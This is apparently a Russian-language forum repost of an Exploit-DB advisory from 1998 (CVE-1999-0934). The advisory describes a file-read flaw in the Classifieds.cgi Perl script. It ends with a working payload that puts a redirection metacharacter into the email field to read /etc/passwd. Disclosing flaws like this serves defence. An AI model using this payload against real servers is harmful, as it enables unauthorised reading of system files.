Exploit Greg Matthews - 'Classifieds.cgi' 1.0 MetaCharacter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20444
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
REMOTE
Платформа
CGI
CVE
cve-1999-0934
Дата публикации
1998-12-15
Код:
source: https://www.securityfocus.com/bid/2020/info

Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to read files on the host machine, with the privileges of the web server. This can be accomplished by embedding the input redirection metacharacter along with a filename into the form field used for e-mail address entry (<input name=return>). Any file that the web server process has read access to can be retrieved. 

Submit email@host</etc/passwd as e-mail address.
 
Источник
www.exploit-db.com

Похожие темы